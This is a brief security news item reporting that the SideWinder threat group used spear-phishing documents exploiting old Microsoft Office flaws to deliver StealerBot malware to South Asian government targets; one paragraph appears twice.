Intrusions with spear-phishing emails and geofenced payloads have been deployed by suspected Indian state-sponsored advanced persistent threat operation Sidewinder to compromise various government entities in Bangladesh, Pakistan, and Sri Lanka with the StealerBot malware, reports The Hacker News.
SideWinder has distributed malicious emails with documents, which led to the injection of payloads exploiting old Microsoft Office remote code execution flaws, tracked as CVE-2017-0199 and CVE-2017-11882, to execute StealerBot, according to an Acronis analysis. Aside from facilitating further malware injections, the .NET-based StealerBot malware also enables reverse shell delivery and credential, file, keystroke, and screenshot gathering activities. "SideWinder has demonstrated consistent activity over time, maintaining a steady pace of operations without prolonged inactivity a pattern that reflects organizational continuity and sustained intent," said Acronis researchers, who noted the threat group's utilization of geofenced and time-limited payloads to be indicative of its elevated control and precision.
SideWinder has distributed malicious emails with documents, which led to the injection of payloads exploiting old Microsoft Office remote code execution flaws, tracked as CVE-2017-0199 and CVE-2017-11882, to execute StealerBot, according to an Acronis analysis. Aside from facilitating further malware injections, the .NET-based StealerBot malware also enables reverse shell delivery and credential, file, keystroke, and screenshot gathering activities. "SideWinder has demonstrated consistent activity over time, maintaining a steady pace of operations without prolonged inactivity a pattern that reflects organizational continuity and sustained intent," said Acronis researchers, who noted the threat group's utilization of geofenced and time-limited payloads to be indicative of its elevated control and precision.
